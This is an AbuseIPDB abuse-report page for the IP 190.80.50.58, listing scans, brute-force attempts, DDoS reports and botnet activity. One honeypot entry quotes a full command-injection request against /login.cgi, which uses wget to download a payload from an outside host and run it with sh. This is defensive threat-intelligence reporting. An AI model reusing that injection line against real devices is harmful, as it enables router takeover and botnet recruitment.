JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 190.80.50.58

190.80.50.58 was found in our database!

This IP was reported 24 times. Confidence of Abuse is 61%: ?

61%

ISP	Guyana Telephone & Telegraph Co.
Usage Type	Fixed Line ISP
ASN	AS19863
Hostname(s)	58-50-pool.dsl.gol.net.gy
Domain Name	gtt.co.gy
Country	🇬🇾 Guyana
City	Georgetown, Demerara-Mahaica

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 190.80.50.58

Whois 190.80.50.58

IP Abuse Reports for 190.80.50.58:

This IP address has been reported a total of 24 times from 17 distinct sources. 190.80.50.58 was first reported on April 13th 2023, and the most recent report was 1 day ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇫🇷 SpaceHost-Server	2026-06-04 22:28:40 (1 day ago)		Brute-Force Web App Attack
🇫🇷 SpaceHost-Server	2026-06-03 22:28:27 (2 days ago)		Brute-Force Web App Attack
🇩🇪 HoneyPotFRI	2026-06-03 08:57:36 (3 days ago)	190.80.50.58 - - [03/Jun/2026:10:57:20 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://140.233.1 ... show more 190.80.50.58 - - [03/Jun/2026:10:57:20 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://140.233.190.47/dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 157 "-" "terrabot-owned-you" ... show less	Bad Web Bot Web App Attack
Anonymous	2026-06-03 08:30:10 (3 days ago)	Fail2Ban triggered	Web App Attack
🇭🇺 bcsaba	2026-06-03 07:46:56 (3 days ago)	Suricata: Alert - ET EXPLOIT D-Link DSL-2750B - OS Command Injection	Web App Attack
🇧🇷 SOC PR	2026-06-03 06:52:40 (3 days ago)	IPS: RCE attempt via web shell endpoint with JAWS malware dropper. Attempt to download and execute J ... show more IPS: RCE attempt via web shell endpoint with JAWS malware dropper. Attempt to download and execute JAWS botnet payload. User-Agent: terrabot-owned-you. show less	Web App Attack
🇯🇵 VXG-NET	2026-06-03 06:48:24 (3 days ago)	port=80, indicator_type=code-execution	Hacking
🇺🇸 MPL	2026-06-03 02:47:09 (3 days ago)	tcp/80	Port Scan
🇺🇸 MPL	2026-06-03 01:28:25 (3 days ago)	tcp/80 (2 or more attempts)	Port Scan
Anonymous	2026-06-03 01:04:39 (3 days ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
🇺🇸 TPI-Abuse	2026-06-01 16:23:47 (5 days ago)	(mod_security) mod_security (id:210730) triggered by 190.80.50.58 (58-50-pool.dsl.gol.net.gy): 1 in ... show more (mod_security) mod_security (id:210730) triggered by 190.80.50.58 (58-50-pool.dsl.gol.net.gy): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Jun 01 12:23:40.461023 2026] [security2:error] [pid 32270:tid 32270] [client 190.80.50.58:13609] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy\|\|www.raintechgutters.com\|F\|2"] [data ".raintechgutters.com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.raintechgutters.com"] [uri "/professional-gutter-repairs-orlando/ www.raintechgutters.com"] [unique_id "ah2yDEr7UFo0kPwvXlmFtgAAABE"] show less	Brute-Force Bad Web Bot Web App Attack
🇩🇪 SMARTNET	2026-05-27 06:03:53 (1 week ago)	Aisuru(Mirai variant) DDoS \| Incident ID: fd8a75e9-7ad9-4605-bec7-39ad26683952	DDoS Attack
🇫🇷 vtchost.com	2026-03-25 05:51:39 (2 months ago)	hit a honeypot - ignored robots.txt - possible botnet ...	Bad Web Bot
🇨🇦 polycoda	2026-03-11 11:55:22 (2 months ago)	🥶 Part of massive botnet scraping campaign that nearly turned into a DDoS on 2025-11-27	DDoS Attack
🇺🇸 kosada.com	2025-12-16 23:47:32 (5 months ago)	Web bot: DDoS	DDoS Attack Bad Web Bot

Showing 1 to 15 of 24 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 2607:f8b0:4001:c61::122

🇨🇳 218.21.226.67

🇺🇸 216.73.217.18

🇮🇶 185.24.61.40

🇺🇸 147.185.132.68

🇺🇸 147.185.132.52

🇨🇳 125.124.226.217

🇫🇷 51.178.64.104

🇸🇪 46.59.109.186

🇸🇬 43.153.204.181

🇨🇳 39.165.33.227

🇺🇸 3.142.232.179

🇬🇧 212.227.125.15

🇮🇳 117.245.135.241

🇺🇸 107.173.21.254

🇮🇳 2a02:4780:11:2052:0:208f:3089:1

🇺🇸 2607:f8b0:4004:c09::128

🇰🇷 220.86.28.189

🇺🇸 205.210.31.103

🇻🇳 157.66.26.151